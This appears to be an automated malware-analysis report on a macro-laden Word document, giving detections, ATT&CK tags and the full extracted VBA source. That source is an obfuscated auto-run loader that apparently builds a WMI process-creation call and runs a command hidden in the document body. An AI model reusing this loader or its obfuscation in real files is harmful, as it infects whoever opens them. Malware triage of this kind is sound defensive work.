MALICIOUS
112
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample contains a VBA macro that executes upon opening the document. This macro utilizes CreateObject to interact with the file system, creating multiple files with obfuscated names and writing content to them. This behavior strongly suggests the macro is designed to download and execute a second-stage payload, a common technique for malware delivery.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set VXNen = CreateObject("Scripting.FileSystemObject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6590 bytes |
SHA-256: f392ec7de4bc91e9168573ed3554ded1ffa8839807d0d22211a4c7f8e84a6f24 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
63 of 121 identifiers look randomly generated (e.g. 'Ohlvd99n2cfq8uwvxx') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sr7ab05dby6ih"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
E969aqvph62ci_d30
End Sub
Attribute VB_Name = "Nnvw4iz8xouj3lt"
Attribute VB_Name = "Ohlvd99n2cfq8uwvxx"
Function E969aqvph62ci_d30()
On Error Resume Next
mKbjhqs = Sr7ab05dby6ih.StoryRanges.Item(4 / 4)
GoTo pKfFBvx
Dim VXNen As Object
Set VXNen = CreateObject("Scripting.FileSystemObject")
Dim pKfFBvx As Object
Set pKfFBvx = VXNen.CreateTextFile("K:\eRKaiHc\fMmmK.HlSVK")
pKfFBvx.WriteLine " "
pKfFBvx.Close
Set VXNen = Nothing
Set pKfFBvx = Nothing
pKfFBvx:
snahbsd = "]e1r[Sp]e1r[S"
Vewmpzqdsdmz0 = "]e1r[Sro]e1r[S]e1r[Sce]e1r[Ss]e1r[Ss]e1r[S]e1r[S"
GoTo pdOkE
Dim oFctFMsrd As Object
Set oFctFMsrd = CreateObject("Scripting.FileSystemObject")
Dim pdOkE As Object
Set pdOkE = oFctFMsrd.CreateTextFile("K:\ClHJF\KjfZSj.QStIkAjCI")
pdOkE.WriteLine " "
pdOkE.Close
Set oFctFMsrd = Nothing
Set pdOkE = Nothing
pdOkE:
Lsj29a5jtune = "]e1r[S:w]e1r[S]e1r[Sin]e1r[S3]e1r[S2]e1r[S_]e1r[S"
GoTo KIIZL
Dim mLZGICD As Object
Set mLZGICD = CreateObject("Scripting.FileSystemObject")
Dim KIIZL As Object
Set KIIZL = mLZGICD.CreateTextFile("K:\ZkyETFAj\iEiDjHB.jSEcDKBC")
KIIZL.WriteLine " "
KIIZL.Close
Set mLZGICD = Nothing
Set KIIZL = Nothing
KIIZL:
Znhqkk_3t24a05 = "w]e1r[Sin]e1r[Sm]e1r[Sgm]e1r[St]e1r[S]e1r[S"
GoTo wxDVA
Dim wCzZAHZGH As Object
Set wCzZAHZGH = CreateObject("Scripting.FileSystemObject")
Dim wxDVA As Object
Set wxDVA = wCzZAHZGH.CreateTextFile("K:\tjLkgHCi\sUaxoAHJ.jNxhHJFFm")
wxDVA.WriteLine " "
wxDVA.Close
Set wCzZAHZGH = Nothing
Set wxDVA = Nothing
wxDVA:
D3e6a4x_kl7w8v25 = "]e1r[S" + Mid(Application.Name, 6, 1) + "]e1r[S"
GoTo AQOmiJI
Dim NKaqpI As Object
Set NKaqpI = CreateObject("Scripting.FileSystemObject")
Dim AQOmiJI As Object
Set AQOmiJI = NKaqpI.CreateTextFile("K:\ZKUdd\vgerA.hFoxD")
AQOmiJI.WriteLine " "
AQOmiJI.Close
Set NKaqpI = Nothing
Set AQOmiJI = Nothing
AQOmiJI:
Eztt8ybo8tsmj = Znhqkk_3t24a05 + D3e6a4x_kl7w8v25 + Lsj29a5jtune + snahbsd + Vewmpzqdsdmz0
GoTo gqvBAAj
Dim wecHG As Object
Set wecHG = CreateObject("Scripting.FileSystemObject")
Dim gqvBAAj As Object
Set gqvBAAj = wecHG.CreateTextFile("K:\ZJBjJDJJ\NGiRIGHJ.hkrGDCHD")
gqvBAAj.WriteLine " "
gqvBAAj.Close
Set wecHG = Nothing
Set gqvBAAj = Nothing
gqvBAAj:
Sb9yvi_z_efnn5 = Bt44vibhy4x5f7(Eztt8ybo8tsmj)
GoTo ywsqIZP
Dim bZWUG As Object
Set bZWUG = CreateObject("Scripting.FileSystemObject")
Dim ywsqIZP As Object
Set ywsqIZP = bZWUG.CreateTextFile("K:\MBClDPC\RumKEBv.HASdHyTG")
ywsqIZP.WriteLine " "
ywsqIZP.Close
Set bZWUG = Nothing
Set ywsqIZP = Nothing
ywsqIZP:
Set Oqh8xdbnuqhoyepqzu = CreateObject(Sb9yvi_z_efnn5)
GoTo HvzSWpDHG
Dim IGEDA As Object
Set IGEDA = CreateObject("Scripting.FileSystemObject")
Dim HvzSWpDHG As Object
Set HvzSWpDHG = IGEDA.CreateTextFile("K:\VvozNJI\jXhgFE.IgwxrnBC")
HvzSWpDHG.WriteLine " "
HvzSWpDHG.Close
Set IGEDA = Nothing
Set HvzSWpDHG = Nothing
HvzSWpDHG:
Chvd3e6k5mklpfdz8 = Mid(mKbjhqs, (15 / 3), Len(mKbjhqs))
GoTo ptZeyI
Dim imMRy As Object
Set imMRy = CreateObject("Scripting.FileSystemObject")
Dim ptZeyI As Object
Set ptZeyI = imMRy.CreateTextFile("K:\wVfBC\sEaVHeAG.rpBcHvJ")
ptZeyI.WriteLine " "
ptZeyI.Close
Set imMRy = Nothing
Set ptZeyI = Nothing
ptZeyI:
GoTo clXpJJq
Dim fFgTdHD As Object
Set fFgTdHD = CreateObject("Scripting.FileSystemObject")
Dim clXpJJq As Object
Set clXpJJq = fFgTdHD.CreateTextFile("K:\HKHWECHH\kUaGBIJCH.PNiAIAGF")
clXpJJq.WriteLine " "
clXpJJq.Close
Set fFgTdHD = Nothing
Set clXpJJq = Nothing
clXpJJq:
Oqh8xdbnuqhoyepqzu.Create Bt44vibhy4x5f7(Chvd3e6k5mklpfdz8), Trmozv619aabvf, Ls9faiq5dk3kpsz
GoTo SOoGw
Dim gZcRCIx As Object
Set gZcRCIx = CreateObject("Scripting.FileSystemObject")
Dim SOoGw As Object
Set SOoGw = gZcRCIx.CreateTextFile("K:\PiAcNSDM\mdQHIJ.UwJfInGXz")
SOoGw.WriteLine " "
SOoGw.Close
Set gZcRCIx = Nothing
Set SOoGw = Nothing
SOoGw:
GoTo DxuFHeAD
Dim SZVcYQB As Object
Set SZVcYQB = CreateObject("Scripting.FileSystemObject")
Dim DxuFHeAD As Object
Set DxuFHeAD = SZVcYQB.CreateTextFile("K:\ygOaDNWF\AsYwak.yxiiHsEB")
DxuFHeAD.WriteLine " "
DxuFHeAD.Close
Set SZVcYQB = Nothing
Set DxuFHeAD = Nothing
DxuFHeAD:
End Function
Function Bt44vibhy4x5f7(Pjrala_j0a04tk)
On Error Resume Next
GoTo QpTqo
Dim MctUXIC As Object
Set MctUXIC = CreateObject("Scripting.FileSystemObject")
Dim QpTqo As Object
Set QpTqo = MctUXIC.CreateTextFile("K:\irKuyQW\YWPpAL.FdShAJWG")
QpTqo.WriteLine " "
QpTqo.Close
Set MctUXIC = Nothing
Set QpTqo = Nothing
QpTqo:
D_bomx85444o16yx = (Pjrala_j0a04tk)
GoTo FFgKqAE
Dim TSpmCCFH As Object
Set TSpmCCFH = CreateObject("Scripting.FileSystemObject")
Dim FFgKqAE As Object
Set FFgKqAE = TSpmCCFH.CreateTextFile("K:\IkWWdEHAC\oWfLCIq.xBefzEdJ")
FFgKqAE.WriteLine " "
FFgKqAE.Close
Set TSpmCCFH = Nothing
Set FFgKqAE = Nothing
FFgKqAE:
Epcesn9hep6 = P_qukkcejk_5gp(D_bomx85444o16yx)
GoTo mjAlMJYF
Dim EQaaBNLA As Object
Set EQaaBNLA = CreateObject("Scripting.FileSystemObject")
Dim mjAlMJYF As Object
Set mjAlMJYF = EQaaBNLA.CreateTextFile("K:\vsrPq\aMIjKHuE.LrPYBWZ")
mjAlMJYF.WriteLine " "
mjAlMJYF.Close
Set EQaaBNLA = Nothing
Set mjAlMJYF = Nothing
mjAlMJYF:
Bt44vibhy4x5f7 = Epcesn9hep6
GoTo rxagBGIFG
Dim eDfBiJxHB As Object
Set eDfBiJxHB = CreateObject("Scripting.FileSystemObject")
Dim rxagBGIFG As Object
Set rxagBGIFG = eDfBiJxHB.CreateTextFile("K:\UkQjbyD\igfWIWBx.ceyGBIE")
rxagBGIFG.WriteLine " "
rxagBGIFG.Close
Set eDfBiJxHB = Nothing
Set rxagBGIFG = Nothing
rxagBGIFG:
End Function
Function P_qukkcejk_5gp(G41desr2zmpoimg)
Utzyq6pfft0 = Bg_2dqrbvn8jy7w8t
GoTo JsxmUHX
Dim RXMiCxGIG As Object
Set RXMiCxGIG = CreateObject("Scripting.FileSystemObject")
Dim JsxmUHX As Object
Set JsxmUHX = RXMiCxGIG.CreateTextFile("K:\XbOvE\EvDIGDE.HXjVJA")
JsxmUHX.WriteLine " "
JsxmUHX.Close
Set RXMiCxGIG = Nothing
Set JsxmUHX = Nothing
JsxmUHX:
P_qukkcejk_5gp = Replace(G41desr2zmpoimg, "]e1r[S", B2qkgjpe6orbdf)
GoTo dWpTEE
Dim FEDazA As Object
Set FEDazA = CreateObject("Scripting.FileSystemObject")
Dim dWpTEE As Object
Set dWpTEE = FEDazA.CreateTextFile("K:\oRgzGHEA\CDFCQJBm.vIgVF")
dWpTEE.WriteLine " "
dWpTEE.Close
Set FEDazA = Nothing
Set dWpTEE = Nothing
dWpTEE:
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.